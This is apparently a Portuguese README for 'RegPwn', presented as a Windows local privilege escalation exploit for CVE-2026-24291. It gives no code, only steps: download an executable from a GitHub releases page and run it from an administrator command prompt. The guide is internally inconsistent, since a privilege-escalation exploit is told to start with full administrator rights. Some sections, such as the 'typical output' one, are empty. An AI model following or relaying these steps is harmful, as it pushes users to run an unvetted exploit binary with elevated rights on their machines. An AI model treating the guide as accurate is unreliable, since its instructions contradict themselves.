
Explore a escalada de privilégios local do Windows em clientes e servidores usando código testado para CVE-2026-24291 em várias versões do Windows.
O RegPwn é uma ferramenta projetada para demonstrar uma exploração de escalada local de privilégios (LPE) em sistemas Windows. Ela funciona no Windows 10, Windows 11 e versões do Windows Server. Este guia ajudará você a baixar, preparar e executar o RegPwn no seu computador Windows com segurança e eficácia.
Antes de baixar o RegPwn, certifique-se de que o seu sistema atende aos seguintes requisitos:
O RegPwn é destinado a ser uma ferramenta de pesquisa. Ele explora vulnerabilidades rastreadas como CVE-2026-24291. Use-o sempre em sistemas nos quais você tenha permissão para testar.
O RegPwn explora uma falha de segurança no Windows que permite aos usuários obter privilégios maiores do que o pretendido. Isso pode ser útil para testar a segurança do sistema e verificar se o seu sistema está vulnerável.
A ferramenta foi testada e confirmada para funcionar nas versões listadas acima. Ela tem como alvo o tratamento do registro no Windows, por isso requer execução cuidadosa.
Para obter a versão mais recente do RegPwn, visite a página de lançamentos:
Visite os Lançamentos do RegPwn
Clicar neste link levará você à página de lançamentos, onde poderá baixar os arquivos. A página de lançamentos listará as versões mais recentes junto com os arquivos necessários para executar.
Clique no botão acima ou abra este link no seu navegador: https://github.com/tracyliving606/RegPwn/releases
Na página de lançamentos, procure a versão mais recente. O lançamento mais recente terá um nome como v1.0 ou superior.
Dentro do lançamento, encontre o arquivo .exe ou um arquivo zip que contenha o executável do RegPwn. Ele pode ter um nome como RegPwn.exe.
Clique no nome do arquivo para iniciar o download. O seu navegador pode pedir confirmação; escolha manter o arquivo.
Após o download, se o arquivo estiver compactado (zip), clique com o botão direito e escolha "Extrair tudo..." para descompactar o conteúdo em uma nova pasta.
Anote o local da pasta onde você salvou ou extraiu o RegPwn.
Executar o RegPwn envolve abrir um prompt de comando e executar o programa como administrador.
Pesquise por "Prompt de Comando" no menu Iniciar do Windows.
Clique com o botão direito em "Prompt de Comando" e selecione "Executar como administrador". Esta etapa é importante porque o programa precisa de acesso total.
Na janela do Prompt de Comando, use o comando cd para mudar para o diretório onde você salvou o RegPwn. Por exemplo, se você o salvou em Downloads\RegPwn, digite:
cd %HOMEPATH%\Downloads\RegPwn
e pressione Enter.
RegPwn.exe
e pressione Enter.
Se você vir erros relacionados a permissões ou arquivos ausentes, verifique se está executando como administrador e se todos os arquivos necessários estão na pasta.
Ao executar o RegPwn, o programa tentará explorar uma falha de segurança no tratamento do registro do Windows. Ele pode produzir mensagens indicando sucesso ou falha.
Uma saída típica pode mostrar:
Não feche o Prompt de Comando até que o RegPwn termine. Fechar cedo pode deixar processos incompletos.
O RegPwn não requer instalação. Você pode simplesmente excluir a pasta onde armazenou o executável para removê-lo.
Se quiser garantir que nenhuma alteração persista:
Para problemas técnicos ou perguntas, use a página de issues do repositório no GitHub:
Issues do GitHub para o RegPwn
Informe detalhes sobre a sua versão do Windows e quais etapas você seguiu. Isso ajuda o desenvolvedor a entender e corrigir problemas.
O RegPwn explora vulnerabilidades conhecidas para testar a segurança do sistema. Use-o apenas em suas próprias máquinas ou sistemas nos quais você tenha permissão. Executar explorações em sistemas não autorizados pode causar danos ou ser ilegal.
Mantenha as atualizações do seu sistema em dia e monitore os boletins de segurança do fornecedor em busca de correções relacionadas à CVE-2026-24291.